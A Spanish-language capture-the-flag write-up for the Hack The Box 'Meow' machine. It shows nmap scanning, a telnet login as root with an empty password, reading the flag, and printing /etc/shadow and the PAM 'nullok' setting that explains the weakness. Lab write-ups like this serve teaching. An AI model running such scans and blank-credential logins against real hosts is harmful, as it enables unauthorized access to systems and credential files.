😐

[ no0funny ]

Meow

Máquina Linux que guía a los jugadores en la configuración de sus máquinas de ataque, la conexión a los laboratorios HTB mediante VPN y demuestra la estrategia para completarlas. La máquina se centra en técnicas de enumeración y muestra la explotación de un servicio Telnet vulnerable mediante credenciales predeterminadas.

Meow

Enumeration

Escaneamos todos los puertos buscando cuáles están abiertos y qué servicios corren en ellos.

sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/allports 10.129.190.222
PORT   STATE SERVICE REASON
23/tcp open  telnet  syn-ack ttl 63

Escaneamos el puerto abierto para ver más detalles sobre el servicio que está corriendo en él.

nmap -p 23 -sCV -oA nmap/openports 10.129.190.222
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

No me des tanta información a ver si no se por donde empezar. Listo, nos conectamos al servicio para ver que onda.

telnet 10.129.190.222
Trying 10.129.190.222...
Connected to 10.129.190.222.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: 
Password: 

Nos pide usuario y contraseña que vaya a saber quien tiene esa data y de donde la sacamos.

Exploitation

Como debe ser nos conectamos con el usuario root para ver si de casualidad no le pasamos contraseña pasa algo como obtener una shell.

telnet 10.129.190.222

Obtenemos una shell como el usuario root y como solo nos interesa la flag con el comando ls vemos si está en el directorio actual.

ls
flag.txt  snap

Resultó que sí, está.

cat flag.txt 

User flag

User flag

b******************************9

Configuración del servidor

sudo cat /etc/shadow
root::18785:0:99999:7:::
<SNIP>

El segundo campo (hash de la contraseña) está vacío.

root es el primer campo, lo que va en medio de ambos dos puntos es el segundo campo ::.

/etc/pam.d/common-auth es un archivo de configuración de autenticación común a todos los servicios.

cat /etc/pam.d/common-auth
<SNIP>
# here are the per-package modules (the "Primary" block)
auth	[success=1 default=ignore]	pam_unix.so nullok
<SNIP>

nullok permite autenticar usuarios cuya contraseña esté vacía.